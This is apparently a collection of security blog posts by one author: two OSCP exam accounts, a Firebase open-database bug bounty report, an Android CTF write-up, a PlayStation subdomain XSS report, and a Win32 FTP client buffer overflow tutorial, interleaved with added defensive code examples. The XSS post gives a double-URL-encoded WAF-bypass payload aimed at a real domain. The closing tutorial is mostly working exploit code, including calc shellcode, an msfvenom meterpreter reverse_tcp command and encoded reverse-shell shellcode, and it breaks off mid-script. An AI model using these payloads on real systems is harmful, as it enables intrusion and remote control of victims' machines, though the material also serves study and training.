For a beginner, OSCP isn't an easy challenge. It was a big challenge for me too. But with enough preparation and practice, the exam isn't going to be hard. I took my OSCP exam on 17th December 2020 and passed on 20th December 2020. Today I will share my experience of my OSCP journey.
OSCP is a well-known certification in the cyber security field and is recognized by most security companies. The exam duration is 24 hours (precisely 23 hours and 45 minutes). During the exam, you need to pentest 5 boxes (Windows or Linux machines). If you want to know the details about OSCP, you can read the Offensive Security website (https://www.offensive-security.com/pwk-oscp/).
Before attempting OSCP, I tried to solve HTB (app.hackthebox.eu) active and retired machines, and completed most of them. For retired machines, there is the great IppSec YouTube channel. Not only does he share walkthroughs of how he rooted machines, he also gives tons of tips and tricks that might come in handy for the exam. I practiced the NetSecFocus OSCP-like machines from VulnHub and also enrolled in the TryHackMe OSCP learning path, which is really helpful for Win32 buffer overflow. For Windows privilege escalation, I studied Tib3rius's Windows privilege escalation course. Then I decided to register for the OSCP course together with my team member, Ba Htoo, on 6th October and got access to the labs and course materials on 11th October. Most of the PWK lab machines aren't as straightforward as exam machines, but some lab machines are similar to the OSCP-like machines from HackTheBox and VulnHub. I followed the PWK Labs Learning Path and completed about 40 lab machines before my lab time expired. After that, I scheduled my exam date for 17th Dec and did some preparation like taking notes and bookmarking helpful documents and useful blog posts before the exam.
Ippsec Youtube channel
For netsecfocus OSCP like machines
TryHackMe OSCP path
Tib3rius’s windows privilege escalation course
PWK Labs Learning Path
For more practice, there is the Proving Grounds practice lab by Offensive Security, with machines created by OffSec experts. Those machines are also helpful for the exam.
Some useful cheatsheets and blog posts
My exam was scheduled at 10:30 am. As the exam is proctored, I had to share my screen and allow the proctor access to my webcam. Then he checked my passport for identification and I had to show around the room as asked, like the corners and under the desk. After the proctor confirmed everything, I received the VPN connectivity pack to connect to the exam network. Then I connected to the exam network and was allocated 6 machines: 5 exam machines and 1 Windows test VM. This VM is the debugger machine for testing the buffer overflow and writing the exploit. As usual, I started scanning all machines and chose to compromise the 25-point Win32 buffer overflow machine first. After that, I moved on to the 10-point machine and then tried another 20-point machine. Rooting those three machines took me about 14 hours. The last 25-point machine was a challenge for me: I only got a user shell. In order to pass the exam, I needed to score 70 points. I took a break and slept for a while. Then I tried again and got a reverse shell as root. Finally, I had done 4 machines. So I took screenshots and notes and checked all of the finished machines again. At that moment, I found a mistake in my bad-character finding: there was an extra bad char in my list, but I hadn't noticed before because I got a system shell on either the test VM or the real machine. I just removed the extra bad char, ran the exploit again and got an administrator shell. After the proctored exam had ended, I started reporting. After checking the report several times, I submitted my report and got my exam result on 20th December. I passed the OSCP exam on my first attempt.
This is my bug bounty write-up about a Firebase database takeover vulnerability which I found in an Android app. There are only a few resources about Android hacking. This article aims to briefly document one of the Android vulnerabilities, called Firebase database takeover. For this purpose I will share my finding about this vulnerability. I will blur some of the company information. That being said, let's jump in.
1. Download the application from the Google Play Store.
2. Use an APK extractor to extract the APK.
3. I used the BlueStacks emulator.
4. Use apktool to decompile the application.
5. Go to res/values/strings.xml.
6. Look for the Firebase URL.
7. I wrote a Python script to insert data.
8. PoC (Proof of Concept).
This application doesn't need any access token to insert data into the Firebase database. It is completely open and anybody can access it without any credentials.
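The two things a reviewer has to do with an app like this are locate the database URL in the decompiled resources and check what the database's rules allow. The following is an added example written for this post, not the author's insertion script and not the vendor's code: it pulls the Firebase URL out of a constructed strings.xml in the form apktool produces, and audits a Realtime Database rules document for the open read/write configuration the post describes, shown beside a locked-down equivalent. The XML, the database host name and both rules documents are constructed for the example.

```python
# Added example (not the author's script): extract the Firebase Realtime Database
# URL from a decompiled app's res/values/strings.xml, then audit a Realtime
# Database rules document for the open-access configuration described above.
# The strings.xml, host name and rules below are constructed for this example.
import json
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample of what apktool leaves in res/values/strings.xml for an app
# built with the Firebase SDK (the google-services plugin generates these names).
SAMPLE_STRINGS_XML = """<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">Example Shop</string>
    <string name="firebase_database_url">https://example-app-12345.firebaseio.com</string>
    <string name="google_api_key">AIza-placeholder-not-a-real-key</string>
</resources>
"""

# Constructed rules: the wide-open configuration and a per-user locked-down one.
OPEN_RULES: Dict = {"rules": {".read": True, ".write": True}}
LOCKED_RULES: Dict = {
    "rules": {
        "users": {
            "$uid": {
                ".read": "auth != null && auth.uid == $uid",
                ".write": "auth != null && auth.uid == $uid",
            }
        }
    }
}


def find_firebase_urls(strings_xml: str) -> List[str]:
    """Return every <string> value in strings.xml that points at a Firebase database host."""
    root = ET.fromstring(strings_xml.encode("utf-8"))
    urls = []
    for node in root.iter("string"):
        value = (node.text or "").strip()
        if value.startswith("https://") and (
            ".firebaseio.com" in value or ".firebasedatabase.app" in value
        ):
            urls.append(value)
    return urls


def _is_unconditional(rule) -> bool:
    # A literal true (or the string "true") grants access to unauthenticated callers.
    return rule is True or (isinstance(rule, str) and rule.strip().lower() == "true")


def audit_rules(rules_doc: Dict) -> List[str]:
    """Walk a Realtime Database rules document and report every path that grants
    unauthenticated read or write access. Rules cascade downward, so an open
    rule at a parent path exposes everything beneath it."""
    findings = []

    def walk(node, path):
        if not isinstance(node, dict):
            return
        for key, value in node.items():
            if key in (".read", ".write"):
                if _is_unconditional(value):
                    findings.append(f"{path or '/'}: {key} is open to everyone")
            elif key not in (".validate", ".indexOn"):
                walk(value, f"{path}/{key}")

    walk(rules_doc.get("rules", {}), "")
    return findings


if __name__ == "__main__":
    for url in find_firebase_urls(SAMPLE_STRINGS_XML):
        print("database URL found in strings.xml:", url)
    print("open rules   ->", audit_rules(OPEN_RULES) or "no findings")
    print("locked rules ->", audit_rules(LOCKED_RULES) or "no findings")
    print(json.dumps(LOCKED_RULES, indent=2))
```

The URL in strings.xml is not the bug; every Firebase app ships it. The bug is the rules document, so the audit is what decides whether a report like this one has impact, and the locked-down rules are the fix the vendor applies.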
Vulnerability Reported – 15 October, 2020 3:37 AM.
Replied – 15 October, 2020 12:31 PM
Rewarded $100 for two reports – 21 October, 2020 11:21 AM.
I really appreciate the company's very fast reply when I submitted the vulnerability, and they allowed me to disclose it. I really enjoyed finding bugs in their organization, and thanks for agreeing to disclose this report and rewarding me with a bounty.
Hello, I am Chan. Today I want to write an article about an Android CTF challenge from Infosec Mobile CTF 2018. While I was learning Android pentesting I found there are few resources about it, so I want to write more articles about Android pentesting and share my knowledge with the community.
That being said, this article aims to briefly document some techniques and tools involved in the vulnerability assessment of Android applications. For this purpose, we will solve the 1st challenge of the Infosec Mobile CTF and learn mobile pentesting through CTF challenges. Please get the APK from here.
I am going to use the BlueStacks emulator to solve this challenge. I have already set up the emulator, so I just click on the app and it installs automatically.
App CTF Challenge 1: The goal behind this challenge is to figure out the username and password that would let the challenger login successfully. The flag should be “password:username”. (ends 4/6)
I will use apktool to decompile the APK.
apktool d App1.apk
I used dex2jar to decompile the APK into a JAR file.
We can see that com.ctf.app1 is the package of the APK file and there is nothing interesting in BuildConfig.class.
It is pretty obvious that this is the MD5 function.
Having seen the MD5 function in the picture above, we can now see that there is an MD5 string. There is a function called OnClick.
What this function does is take the username and password from the user, combine them into one string, hash it using MD5 and compare the hash to 263c7fa932b26a56ec0ad76b94aff98b.
I used this website, https://hashes.com/en/decrypt/hash, to decrypt the MD5 hash.
As mentioned in the challenge description, the flag is the username and password.
Username: admin, Password: [email protected]
After submitting the username and password, we get the smiley face :)
This is my first article about Android pentesting. If you would like to learn more about Android pentest challenges, please keep reading my blog. I will upload more Android pentest challenges and solutions. This is going to be a series on learning Android pentesting through CTF challenges.
If you like this article, please share it on your social media and with your friends.
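The OnClick handler above is worth writing out in plain Python, because its weaknesses are easier to see in a few lines than in decompiled Smali. The following is an added example for this article, not the CTF app's own code: the first function is the check the app performs, the rest is a server-side verifier that does not share its problems. The credentials and hashes used here are constructed (the well-known MD5 values of "admin" and "password"); the app's real hash and password are not used.

```python
# Added example (not the CTF app's code): the client-side check the decompiled
# OnClick handler performs, written out in Python so its weaknesses are visible,
# next to a server-side verifier that does not share them. All credentials here
# are constructed for the example.
import hashlib
import hmac
import os
from typing import Dict


def credential_digest(username: str, password: str) -> str:
    """What the app does: concatenate username and password with no separator
    and take the MD5 of the result."""
    return hashlib.md5((username + password).encode("utf-8")).hexdigest()


def vulnerable_login(username: str, password: str, expected_md5: str) -> bool:
    # Weak for three independent reasons:
    #  1. the expected hash ships inside the APK, so anyone with apktool can read it;
    #  2. MD5 of a short, unsalted string is trivially reversed with a lookup site;
    #  3. "username + password" has no delimiter, so ("pass", "word") and
    #     ("passw", "ord") hash to the same value and both log in.
    return credential_digest(username, password) == expected_md5


# --- hardened alternative: verification stays on the server -------------------
PBKDF2_ROUNDS = 200_000


def make_record(password: str) -> Dict[str, bytes]:
    """Store a random per-user salt and a slow PBKDF2-HMAC-SHA256 digest, never the password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return {"salt": salt, "digest": digest}


def hardened_verify(record: Dict[str, bytes], password: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), record["salt"], PBKDF2_ROUNDS
    )
    return hmac.compare_digest(candidate, record["digest"])


if __name__ == "__main__":
    # Delimiter-free concatenation collides: md5("pass"+"word") == md5("passw"+"ord").
    print(credential_digest("pass", "word") == credential_digest("passw", "ord"))
    rec = make_record("correct horse battery staple")  # constructed password
    print(hardened_verify(rec, "correct horse battery staple"),
          hardened_verify(rec, "wrong"))
```

The collision in the last point is not a weakness of MD5 itself but of encoding two fields as one undelimited string; it is the same class of mistake whatever hash is used, which is why the hardened version hashes only the password and keeps the username as a lookup key.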
When people hear OSCP, they think of the exam as a beast or a monster that will tear them apart. Yes, I did think like that in the past, but with proper preparation any beast or exam can be defeated. I took the OSCP exam on 27th August 2020 and passed on 31st August 2020. Today I will share my experience of the OSCP journey.
OSCP (Offensive Security Certified Professional) is a well-known certification in cyber security. It is famous for its 100% hands-on exam, which is really quite challenging. The exam duration is 24 hours (precisely 23 hours and 45 minutes). In the exam, you have to do penetration testing on 5 boxes (meaning 5 computer servers), so timing is also very important. If you want to know the details about OSCP, you can Google it because I'm not going to explain them in detail.
Before doing OSCP, I spent most of my time solving the NetSecFocus OSCP-like machines from VulnHub and HackTheBox. I completed 85% of the machines. Then I decided to purchase the OSCP course on June 27 and got access to the labs and materials on July 5. In 20 days, I solved 35 machines from the OSCP labs, including the big 4, which are considered difficult but not as difficult as HackTheBox hard machines :C. Then I worried about my Windows privilege escalation skills and decided to purchase Tib3rius's Windows privilege escalation course, which is really good for beginners. I did that course and just went roughly through the TryHackMe OSCP learning path. Then I decided to schedule my exam date for 27th August and relaxed my mind for 5 days before the exam.
For netsecfocus OSCP like machines
Tib3rius’s windows privilege escalation course
Tryhackme OSCP path
I scheduled my exam for 7:30 am. Morning is refreshing and is the best time to start. Due to my poor internet connection, I started at 7:50 am. The internet connection is very important for this exam. The exam is proctored. The proctor checked my passport for identification and I had to show around the room and under the desk as asked. I had to share my screen and allow the proctor access to my webcam. So I recommend checking screen sharing and the webcam before taking the exam. As usual, I did all the scanning on all boxes while doing the buffer overflow. Before starting the exam, I started my Windows 7 VirtualBox VM on my Kali machine in preparation, but it turned out to be very disadvantageous. My laptop was super slow and laggy. I was nervous because of the late start, and Immunity Debugger was very laggy on my machine. Because I was nervous, I made mistakes. I did the buffer overflow patiently and after one and a half hours I got the flag. Then I saw that my masscan did not get any output from one of the machines. I decided to scan it again and then my laptop hung. I had to restart my laptop in a hurry and emailed OSCP support about my problems. I reconnected to the exam panel and told them about my problems. Then I resumed my exam, but sadly I did not have any scan results. So I decided to scan and do the boxes one after another. At exactly 1:30 pm I had done 4 boxes and decided to get lunch. After lunch, I decided to do the reporting first because I'm bad at reporting and was worried about my screenshots. After checking my report several times, I ended my exam. The next morning I submitted my report and got my exam result on 31st August. I passed the OSCP exam on my 1st attempt.
Hello all! Today I decided to share my finding of an XSS on a subdomain of PlayStation. It was about a year ago, I think, that I started hunting bugs on Sony websites, and first I found directory indexing on [ https://blog.latam.playstation.com/wp-content/ https://blog.latam.playstation.com/wp/wp-includes/ https://blog.us.playstation.com/wp/wp-includes/ https://blog.us.playstation.com/wp-content/ https://blog.br.playstation.com/wp/wp-includes/ https://blog.br.playstation.com/wp-content/ https://rd.playstation.com/ ]
Then I reported it to Sony and they didn't accept it because they could not find any impact. I didn't understand why they said that :3 and I was like, okay. Then I tried to dig more into the folders and found this page [ https://blog.latam.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html ]. I found QUnit 1.21.0 on the page and decided to search Google for an exploit. Then I found this page.
There are two PoCs, and the 2nd PoC shows that the parameter testId is vulnerable to XSS. So I decided to give it a try. First I injected the payload <svg onload=alert(1)> and the WAF filtered it. Then I fuzzed a lot and at last, boom! Double URL encoding bypassed the WAF.
So the PoC link is [ https://blog.us.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html?testId=%25%33%63%25%37%33%25%37%36%25%36%37%25%32%30%25%36%66%25%36%65%25%36%63%25%36%66%25%36%31%25%36%34%25%33%64%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%32%65%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39%25%36%65%25%32%39%25%33%65 ].
Then I reported the bug and they replied after 3 months and rewarded me with swag that was never shipped to me :V.
That's my story of XSS on PlayStation. Hope you like it. Thanks!
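Why did the double-encoded value get past the filter when the plain one did not? An inspection layer that percent-decodes a parameter once sees `%3c%73%76...`, which contains no `<`, and lets it through; the browser then decodes it again. The following is an added example written for this post, not the author's script and not the vendor's WAF: it takes the testId value from the PoC link above, shows what one decoding pass and a decode-to-fixed-point produce, and compares a filter that inspects after one pass with one that canonicalises first. The filter logic is constructed for the example.

```python
# Added example (not the author's script, not the vendor's WAF): percent-decoding
# to a fixed point before inspection, and why a single-pass filter misses a
# double-URL-encoded value. The testId value is the one from the PoC link in
# the post; the filter functions are constructed for this example.
from urllib.parse import unquote

# testId value from the PoC link above (double URL-encoded).
POC_TESTID = (
    "%25%33%63%25%37%33%25%37%36%25%36%37%25%32%30%25%36%66%25%36%65%25%36%63"
    "%25%36%66%25%36%31%25%36%34%25%33%64%25%36%31%25%36%63%25%36%35%25%37%32"
    "%25%37%34%25%32%38%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35"
    "%25%36%65%25%37%34%25%32%65%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39"
    "%25%36%65%25%32%39%25%33%65"
)

MAX_DECODE_PASSES = 5  # bound the loop; input still changing after this many passes is itself a signal


def decode_fully(value: str):
    """Percent-decode repeatedly until the value stops changing.
    Returns (canonical_value, passes_needed)."""
    passes = 0
    while passes < MAX_DECODE_PASSES:
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        passes += 1
    return value, passes


def looks_like_markup(value: str) -> bool:
    # Deliberately crude; the point of the example is where this runs, not how clever it is.
    return "<" in value and ">" in value


def naive_filter_blocks(raw_param: str) -> bool:
    """Decode once, then inspect. A double-encoded payload still reads as
    harmless %xx text at this point, which is what the bypass relies on."""
    return looks_like_markup(unquote(raw_param))


def normalised_filter_blocks(raw_param: str) -> bool:
    """Canonicalise to a fixed point first, then inspect."""
    decoded, _ = decode_fully(raw_param)
    return looks_like_markup(decoded)


if __name__ == "__main__":
    canonical, passes = decode_fully(POC_TESTID)
    print(f"after 1 pass : {unquote(POC_TESTID)}")
    print(f"after {passes} passes: {canonical}")
    print("single-pass filter blocks it?", naive_filter_blocks(POC_TESTID))
    print("normalised filter blocks it? ", normalised_filter_blocks(POC_TESTID))
```

Canonicalising before inspection is defence in depth at the edge; the fix that actually removes the bug is for the page to HTML-encode testId before writing it into the DOM, which is why a WAF finding alone is rarely the end of the story.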
Today I will show how to exploit a 32-bit Windows buffer overflow. This is my first blog post.
Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs.
A buffer overflow occurs when a program or process attempts to write more data to a fixed-length block of memory, or buffer, than the buffer is allocated to hold. Since buffers are created to contain a defined amount of data, the extra data can overwrite data values in memory addresses adjacent to the destination buffer unless the program includes sufficient bounds checking to flag or discard data when too much is sent to a memory buffer.
There are a lot of tutorials about this 32-bit FTP Windows buffer overflow, but I want to use a modern technique while exploiting it. Let's start.
First you need to load the 32-bit FTP client in Immunity Debugger.
File > Open > select the FTP executable and open it.
When I run it via the debugger, it asks me for the FTP server IP and port. So we need to create an FTP server and let the FTP client connect to us. Let's create a simple FTP server using pwntools.
```python
from pwn import *

# Minimal "FTP server": listen on TCP 21 and send a banner line (220 = service ready)
# as soon as the FTP client running under the debugger connects. Port 21 needs root,
# hence the sudo below.
l = listen(21)
payload = b"Sent some strings"
_ = l.wait_for_connection()
l.sendline(b"220 " + payload)
```
sudo python test.py
Important: once you run it under the debugger, every time you need to restart the program by pressing Ctrl+F2 or Debug tab > Restart.
Next step: let's crash the FTP client with a bunch of "A"s.
```python
from pwn import *

# Same listener, but the banner now carries 1000 "A" bytes to overflow the client's buffer.
l = listen(21)
payload = b"A" * 1000
_ = l.wait_for_connection()
l.sendline(b"220 " + payload)
```
Great! It crashed. When we look at EIP in the debugger, the stack is filled with a lot of "A"s (EIP = 41414141).
All of the registers have been overwritten with 41 (hex for A). This means that we have a buffer overflow vulnerability on our hands and we have proven that we can overwrite EIP. At this point, we know that the bytes landing in EIP are located somewhere between 1 and 1000 bytes into the buffer, but we are not sure where exactly. What we need to do next is figure out exactly where EIP is located (in bytes) and attempt to control it.
The next step is to find the offset. Let's find it.
```python
from pwn import *

# Send a 1000-byte cyclic (de Bruijn) pattern instead of "A"s: every 4-byte window is
# unique, so the value that lands in EIP tells us the exact offset.
l = listen(21)
payload = cyclic(1000)
_ = l.wait_for_connection()
l.sendline(b"220 " + payload)
```
Take the EIP value (786A6161) and look it up with cyclic_find().
Offset = 989
To execute shellcode, we need to find the address of a JMP ESP or CALL ESP instruction, so that EIP points to it and execution jumps to the address stored in ESP. When you loaded the FTP client in Immunity, you saw that the kernel32.dll module was also loaded, so we jump through an address in that module to let the shellcode run.
!mona jmp -r esp -m kernel
You will see 3 JMP ESP addresses and 2 CALL ESP addresses. You can use any one of them; all of the addresses work. So let's jump to one of these addresses with shellcode. First I will execute the calculator; after this I will show how to generate a reverse shell and exploit this. Let's pop calc.
To generate the calc shellcode using msfvenom:
msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b "\x00"
Note: this FTP client doesn't have any bad characters, so I will not show you how to find bad characters the easy way and how to avoid them. I will write about that in another post.
The goal is: buffer + JMP ESP + NOP + shellcode.
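The two pwntools calls above, cyclic() and cyclic_find(), are doing something simple enough to write by hand, and doing so shows why the EIP value 786A6161 maps to offset 989. The following is an added example for this post, not the author's exploit script and not pwntools itself: a dependency-free de Bruijn pattern generator and offset lookup using the same alphabet (a-z), window size (4) and construction as pwntools' defaults, plus a small builder for the buffer + JMP ESP + NOP + shellcode layout that refuses to emit a payload containing a listed bad character (the check that would have caught the extra bad char mentioned in the OSCP post). The return address and shellcode bytes passed to it are constructed placeholders.

```python
# Added example (not the author's script, not pwntools): a dependency-free
# cyclic()/cyclic_find() using the same alphabet, window size and de Bruijn
# construction as pwntools' defaults, plus a layout builder with a bad-character
# check. Return address and shellcode in the demo are constructed placeholders.
import functools
import struct
from typing import Iterable, List

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
SUBSEQ_LEN = 4  # every 4-byte window of the pattern is unique


@functools.lru_cache(maxsize=None)
def de_bruijn(alphabet: bytes = ALPHABET, n: int = SUBSEQ_LEN) -> bytes:
    """Standard de Bruijn sequence B(k, n): every length-n string over the
    alphabet occurs exactly once (same construction pwntools uses)."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(alphabet[i] for i in a[1 : p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern (what the post sends as cyclic(1000))."""
    return de_bruijn()[:length]


def cyclic_find(value: int) -> int:
    """Offset of the 4 bytes that landed in EIP. The register holds them
    little-endian, so 0x786A6161 is the substring b"aajx" of the pattern."""
    needle = struct.pack("<I", value)
    return de_bruijn().find(needle)


def find_badchars(data: bytes, badchars: Iterable[int]) -> List[int]:
    """Distinct bytes of `data` that appear in the bad-character list, sorted."""
    bad = set(badchars)
    return sorted({b for b in data if b in bad})


def build_payload(offset: int, ret_addr: int, shellcode: bytes,
                  nop_count: int = 30, badchars: Iterable[int] = (0x00,)) -> bytes:
    """buffer + return address + NOP sled + shellcode, the layout described in the
    post. Raises ValueError if any byte of the result is a listed bad character,
    so a wrong return address or unencoded shellcode is caught before sending."""
    payload = (b"A" * offset
               + struct.pack("<I", ret_addr)  # little-endian, like pwntools p32()
               + b"\x90" * nop_count
               + shellcode)
    bad = find_badchars(payload, badchars)
    if bad:
        raise ValueError("payload contains bad characters: "
                         + ", ".join(f"0x{b:02x}" for b in bad))
    return payload


if __name__ == "__main__":
    print(cyclic(20))                          # b'aaaabaaacaaadaaaeaaa'
    print(cyclic_find(0x786A6161))             # 989, as in the post
    demo = build_payload(989, 0x765A3132, b"\xcc" * 8)   # placeholder shellcode
    print(len(demo), "bytes")
    try:
        build_payload(989, 0x765A0032, b"\xcc" * 8)      # address with a NUL byte
    except ValueError as exc:
        print("rejected:", exc)
```

The offset comes out at 989 because "aajx" is the 248th 4-byte word of the sequence, counting from the leading "a"; any other EIP value is found the same way, and a value that is not found (find() returns -1) means EIP was not overwritten by your pattern at all, which usually points at a truncated send.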
Some attacks consist of making the program jump to a specific address and continue running from there. The injected code has to be loaded previously somehow in that exact location.
Stack randomization and other runtime differences may make the address where the program will jump impossible to predict, so the attacker places a NOP sled in a big range of memory. If the program jumps to anywhere into the sled, it will run all the remaining NOPs, doing nothing, and then will run the payload code, just next to the sled.
The reason the attacker uses the NOP sled is to make the target address bigger: the code can jump anywhere in the sled, instead of exactly at the beginning of the injected code.
A 128-byte NOP sled is just a group of NOP instructions 128 bytes wide.
NOTE #1: NOP (No-OPeration) is an instruction available in most (all?) architectures that does nothing, other than occupying memory and some runtime.
NOTE #2: in architectures with variable length instructions, a NOP instruction is usually just one byte in length, so it can be used as a convenient instruction padding. Unfortunately, that also makes it easy to do a NOP sled.
Ref : https://stackoverflow.com/questions/14760587/how-does-a-nop-sled-work
```python
from pwn import *

payload = b"\x41" * 989          # padding up to the saved return address (offset 989)
payload += p32(0x765A3132)       # JMP ESP address in kernel32.dll found with mona, little-endian
payload += b"\x90" * 30          # NOP sled
payload += (                     # calc.exe shellcode
    b"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
    b"\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
    b"\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
    b"\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73"
    b"\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
    b"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61"
    b"\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
)
l = listen(21)
_ = l.wait_for_connection()
l.sendline(b"220 " + payload)
```
Okay, calc.exe pops up successfully. Now I will generate the reverse shell shellcode using msfvenom, because I want to control this machine; popping calc isn't enough for me :D
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.255.232 LPORT=4444 -a x86 --platform win -e x86/alpha_mixed -f c -b '\x00'
Put the result in the Python script and run it.
```python
from pwn import *

payload = b"\x41" * 989          # padding up to the saved return address (offset 989)
payload += p32(0x771F3132)       # JMP ESP address in kernel32.dll (module base changes between reboots, re-check with mona)
payload += b"\x90" * 30          # NOP sled
payload += (                     # windows/meterpreter/reverse_tcp, x86/alpha_mixed encoded
    b"\x89\xe6\xd9\xea\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    b"\x59\x6c\x6a\x48\x4b\x32\x75\x50\x43\x30\x73\x30\x65\x30\x6c"
    b"\x49\x6a\x45\x54\x71\x79\x50\x62\x44\x4c\x4b\x66\x30\x70\x30"
    b"\x4e\x6b\x53\x62\x44\x4c\x4c\x4b\x31\x42\x54\x54\x4c\x4b\x63"
    b"\x42\x44\x68\x46\x6f\x4c\x77\x53\x7a\x55\x76\x44\x71\x59\x6f"
    b"\x4c\x6c\x65\x6c\x30\x61\x33\x4c\x46\x62\x46\x4c\x35\x70\x4a"
    b"\x61\x5a\x6f\x56\x6d\x43\x31\x4a\x67\x58\x62\x49\x62\x61\x42"
    b"\x30\x57\x6e\x6b\x62\x72\x42\x30\x6c\x4b\x30\x4a\x67\x4c\x6c"
    b"\x4b\x62\x6c\x66\x71\x30\x78\x49\x73\x57\x38\x46\x61\x5a\x71"
    b"\x72\x71\x6c\x4b\x61\x49\x71\x30\x37\x71\x6b\x63\x6c\x4b\x37"
    b"\x39\x57\x68\x79\x73\x45\x6a\x30\x49\x4c\x4b\x64\x74\x4e\x6b"
    b"\x67\x71\x79\x46\x30\x31\x39\x6f\x6e\x4c\x69\x51\x5a\x6f\x76"
    b"\x6d\x36\x61\x6b\x77\x67\x48\x59\x70\x73\x45\x38\x76\x54\x43"
    b"\x63\x4d\x7a\x58\x45\x6b\x51\x6d\x44\x64\x73\x45\x6d\x34\x46"
    b"\x38\x6e\x6b\x50\x58\x64\x64\x76\x61\x69\x43\x35\x36\x4e\x6b"
    b"\x44\x4c\x62\x6b\x6e\x6b\x52\x78\x75\x4c\x43\x31\x4a\x73\x4c"
    b"\x4b\x47\x74\x6e\x6b\x77\x71\x4e\x30\x4b\x39\x31\x54\x65\x74"
    b"\x55\x74\x43\x6b\x43\x6b\x35\x31\x51\x49\x63\x6a\x50\x51\x4b"
    b"\x4f\x4b\x50\x71\x4f\x51\x4f\x50\x5a\x6c\x4b\x62\x32\x5a\x4b"
    b"\x4e\x6d\x63\x6d\x72\x48\x56\x53\x55\x62\x73\x30\x53\x30\x35"
    b"\x38\x34\x37\x70\x73\x67\x42\x63\x6f\x51\x44\x42\x48\x50\x4c"
    b"\x44\x37\x54\x66\x35\x57\x6e\x69\x58\x68\x69\x6f\x68\x50\x6c"
    b"\x78\x6c\x50\x46\x61\x33\x30\x53\x30\x46\x49\x69\x54\x46\x34"
    b"\x36\x30\x75\x38\x46\x49\x6f\x70\x70\x6b\x35\x50\x4b\x4f\x4b"
    b"\x65\x43\x5a\x46\x6a\x32\x48\x46\x6a\x76\x69\x69\x6f\x58\x68"
    b"\x45\x38\x37\x72\x57\x70\x44\x51\x63\x6c\x6e\x69\x49\x76\x66"
    b"\x30\x72\x70\x42\x70\x56\x30\x37\x30\x56\x30\x57\x30\x32\x70"
    b"\x51\x78\x68\x6a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x49\x45\x7a"
    b"\x37\x72\x4a\x32\x30\x50\x56\x31\x47\x62\x48\x7a\x39\x6d\x75"
    b"\x53\x44\x33\x51\x69\x6f\x79\x45\x4b\x35\x4f\x30\x62\x54\x57"
    b"\x7a\x6b\x4f\x62\x6e\x43\x38\x71\x65\x7a\x4c\x69\x78\x63\x57"
    b"\x65\x50\x65\x50\x33\x30\x43\x5a\x63\x30\x63\x5a\x34\x44\x53"
    b"\x66\x30\x57\x42\x48\x44\x42\x5a\x79\x6b\x78\x31\x4f\x49\x6f"
    b"\x7a\x75\x6e\x63\x79\x68\x63\x30\x53\x4e\x76\x56\x4c\x4b\x55"
    b"\x66\x63\x5a\x47\x30\x65\x38\x63\x30\x34\x50\x55\x50\x35\x50"
    b"\x61\x46\x63\x5a\x73\x30\x33\x58\x53\x68\x6f\x54\x51\x43\x5a"
    b"\x45\x39\x6f\x7a\x75\x4d\x43\x72\x73\x71\x7a\x63\x30\x31\x46"
    b"\x43\x63\x71\x47\x52\x48\x63\x32\x79\x49\x39\x58\x43\x6f\x69"
    b"\x6f\x6b\x65\x4c\x43\x6b\x48\x35\x50\x33\x4d\x65\x78\x52\x78"
    b"\x35\x38\x55\x50\x63\x70\x35\x50\x47\x70\x50\x6a\x77\x70\x70"
    b"\x50\x43\x58\x56\x6b\x36\x4f\x56\x6f\x76\x50\x79\x6f\x49\x45"
    b"\x36\x37\x32\x48\x34\x35\x72\x4e\x42\x6d\x73\x51\x39\x6f\x6a"
    b"\x75\x31\x4e\x33\x6e\x69\x6f\x66\x6c\x66\x44\x44\x4f\x4e\x65"
    b"\x42\x50\x39\x6f\x49\x6f\x69\x6f\x59\x79\x6f\x6b\x6b\x4f\x39"
    b"\x6f\x59\x6f\x56\x61\x6a\x63\x76\x49\x49\x56\x64\x35\x59\x51"
    b"\x69\x53\x6f\x4b\x78\x70\x6c\x75\x6c\x62\x70\x56\x63\x5a\x63"
    b"\x30\x61\x43\x49\x6f\x5a\x75\x41\x41"
)
